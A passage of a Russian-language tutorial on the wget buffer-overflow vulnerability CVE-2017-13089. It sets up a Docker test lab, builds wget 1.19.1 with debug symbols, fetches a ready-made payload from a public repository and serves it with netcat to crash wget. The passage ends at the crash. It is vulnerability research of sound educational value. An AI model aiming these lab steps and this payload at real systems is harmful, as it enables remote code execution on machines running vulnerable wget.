Практически в каждом дистрибутиве Linux есть такая полезная утилита, как wget. С ее помощью легко и удобно скачивать большие файлы. Она же встречается и на веб-серверах, где любая уязвимость может обернуться пренеприятными последствиями для владельца. Мы разберем, как работает баг wget, связанный с переполнением буфера. Его эксплуатация может привести к выполнению произвольных команд на целевой системе.

INFO Уязвимости присвоен номер CVE-2017-13089, она присутствует во всех версиях wget вплоть до 1.19.1.

Стенд

Сперва готовим площадку для будущих экспериментов. Тут нам на помощь пришла работа Роберта Дженсена (Robert Jensen), который собрал докер-контейнер для тестирования уязвимости. Скачать докер-файл, эксплоит и прочее ты можешь в его репозитории. Затем останется только выполнить

docker build -t cve201713089 .

Если ничего качать не хочется, то достаточно команды

docker pull robertcolejensen/cve201713089

Затем запускаем контейнер.

docker run --rm --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -ti --name=wget --hostname=wget robertcolejensen/cve201713089 /bin/bash

Подключившись к контейнеру, компилируем исходники wget с флагом -g для более удобной отладки.

$ wget ftp://ftp.gnu.org/gnu/wget/wget-1.19.1.tar.gz $ tar xvzf wget-1.19.1.tar.gz $ cd wget-1.19.1 && CFLAGS="-g" ./configure && make && make install && cd -

Проверим, успешно ли скомпилились исходники с поддержкой отладочных символов.

$ gdb wget

Теперь с этим можно работать. Переходим к следующему этапу.

Анализируем уязвимость

Давай сразу посмотрим, как можно триггернуть уязвимость. Для этого в репозитории есть пейлоад, который можно скачать тем же wget. 🙂

$ wget https://raw.githubusercontent.com/r1b/CVE-2017-13089/master/src/exploit/payload

Перенаправим вывод из файла в порт при помощи netcat и попробуем получить содержимое через wget.

$ nc -lp 1337 < payload & $ wget --debug localhost:1337

После коннекта и получения ответа утилита крашится.